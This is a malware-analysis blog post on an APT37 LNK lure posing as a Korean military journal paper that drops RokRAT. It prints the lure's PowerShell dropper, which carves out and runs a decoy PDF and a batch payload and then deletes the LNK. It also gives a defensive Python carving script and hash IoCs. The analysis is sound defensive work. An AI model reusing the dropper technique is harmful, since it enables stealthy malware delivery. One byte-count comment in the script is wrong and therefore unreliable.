Malware made by the North Korean hacking group APT37 (Reaper): 한국군사학논총 (2025.3.26)
Today I am writing about 한국군사학논총 (2025.3.26), a piece of malware made by the North Korean hacking group APT37 (Reaper). The lure name translates roughly as "Korean Journal of Military Studies".
The attack disguises the file as a defense-sector academic paper that is currently being submitted for publication and uses it to deliver the RokRAT malware.
Its defining characteristic is that it abuses PowerShell to do the work.
File name: 한국군사학논총.lnk
Size: 50 MB
MD5: 2f431c4e65af9908d2182c6a093bf262
SHA-1: d4f15c892cc8c56fba4756526871b2b5f9def840
SHA-256: d182834a984c9f5b44ea0aca5786223a78138ff23d33362ab699c76bf6987261
Malware contents
StringData
{
  namestring:
  relativepath: not present
  workingdir: not present
  commandlinearguments:
    /k for /f "tokens=*" %a in ('d)ir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell(.)exe /s /b /od') do call %a "
    $dirPath = Get-Location;
    if($dirPath -Match 'S(y)stem32' -or $di(r)Path -Match 'Pro(g)ram Files') {$dirPath = '%t(e)mp%'};
    $exs=@('(.)lnk');
    ($)lnkPath = Get-Ch(i)ldItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;
    $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.File(A)ccess]::Read);
    $lnkFile.Seek(0x(0)00010E4, [System.IO(.)SeekOrigin]::Begin);
    $pdf(F)ile=New-Object byte[] 0x002A7965;
    $lnkFile.Read($pdfFile, 0, 0x002A7965);
    $pdfPath = $lnkPath.replace('.lnk','.pdf');
    sc $pdfPath $pdfFile -Encoding Byte;
    & $pdfPath;
    $lnkFile.Seek(0x002A(8)A49,[System.IO.SeekOrigin]::Begin);
    $exeFile=New-Object byte[] 0(x)000D9190;
    $lnkFile.Read($exeFile, 0, 0x000D9190);
    $exePath=$env:temp(+)'\toy01(.)dat';
    sc $exePath $exeFile -Encoding Byte;
    $lnkFile(.)Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);
    $stringByte = New-Object byte[] 0x00000634(;$)lnkFile.Read($stringByte, 0, 0x00000634);
    $batStrPath = $env:temp+'\'+'toy02(.)dat';
    $string = [Text(.)Encoding]::GetEncoding('utf-8').GetString($stringByte);
    $string | Out-File -FilePath $batStrPath -Encoding ascii;
    $lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);
    $ba(t)Byte = New-Object byte[] 0x0000014C;
    $lnkFile.Read($batByte, 0, 0x0000014C);
    $executePath = $env:temp+'\'+'toy0'(+)'3.b'(+)'a'+'t';
    Write-Host $executePath;
    Write-Host $ba(t)StrPath;
    $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);
    $bastString | Out-File -FilePath $executePath -Encoding ascii;
    &$executePath;
    $lnkFile.Close();
    [System(.)IO.File]::Delete($lnkPath);"&& …
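To pull the embedded files out of this LNK for analysis without running any of them, here is an added Python example (my own code, not from the original post). It uses the four Seek/Read offsets and lengths from the command line above, and it also checks that the four ranges sit back to back, which they do. The output names mirror what the dropper writes to %TEMP%; "decoy.pdf" is an assumption, since the dropper names the PDF after the LNK itself.

```python
import hashlib
import sys
from dataclasses import dataclass
from pathlib import Path
# Offsets/lengths are the values the dropper's PowerShell passes to Seek()/Read().
# Names are the ones it writes under %TEMP%; "decoy.pdf" stands in for the PDF,
# which the dropper names after the LNK itself (an assumption, not from the post).
LAYOUT = (
    ("decoy.pdf", 0x000010E4, 0x002A7965),  # decoy PDF opened for the victim
    ("toy01.dat", 0x002A8A49, 0x000D9190),  # executable payload
    ("toy02.dat", 0x00381BD9, 0x00000634),  # UTF-8 text blob
    ("toy03.bat", 0x0038220D, 0x0000014C),  # batch script the dropper runs
)
LNK_SIZE = 0x031732EF  # the file size the script matches on (51,721,967 bytes)

@dataclass
class Payload:
    name: str
    offset: int
    length: int
    sha256: str
    data: bytes

def layout_is_contiguous(layout=LAYOUT) -> bool:
    """True when each blob starts exactly where the previous one ends."""
    return all(o + n == layout[i + 1][1] for i, (_, o, n) in enumerate(layout[:-1]))

def carve(data: bytes, layout=LAYOUT) -> list[Payload]:
    """Slice every embedded blob out of the LNK bytes; nothing is executed."""
    payloads = []
    for name, offset, length in layout:
        end = offset + length
        if end > len(data):
            raise ValueError(f"{name}: 0x{offset:X}-0x{end:X} lies past end of file ({len(data)} bytes)")
        blob = bytes(data[offset:end])
        payloads.append(Payload(name, offset, length, hashlib.sha256(blob).hexdigest(), blob))
    return payloads

def main(lnk_path: str, out_dir: str) -> None:
    data = Path(lnk_path).read_bytes()
    if len(data) != LNK_SIZE:
        print(f"warning: size {len(data)} != 0x{LNK_SIZE:X}; offsets may not apply")
    Path(out_dir).mkdir(parents=True, exist_ok=True)
    for p in carve(data):
        Path(out_dir, p.name + ".bin").write_bytes(p.data)  # .bin so nothing runs by accident
        print(f"{p.name:10} off=0x{p.offset:08X} len=0x{p.length:08X} head={p.data[:4]!r} sha256={p.sha256}")

if __name__ == "__main__":
    main(sys.argv[1], sys.argv[2])
```

Run it as `python carve_lnk.py 한국군사학논총.lnk out/` on an isolated analysis box; the printed head bytes (`%PDF`, `MZ`) confirm the offsets line up before you hand the blobs to a sandbox.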
IoC
SHA-256: d182834a984c9f5b44ea0aca5786223a78138ff23d33362ab699c76bf6987261
SHA-1: d4f15c892cc8c56fba4756526871b2b5f9def840
MD5: 2f431c4e65af9908d2182c6a093bf262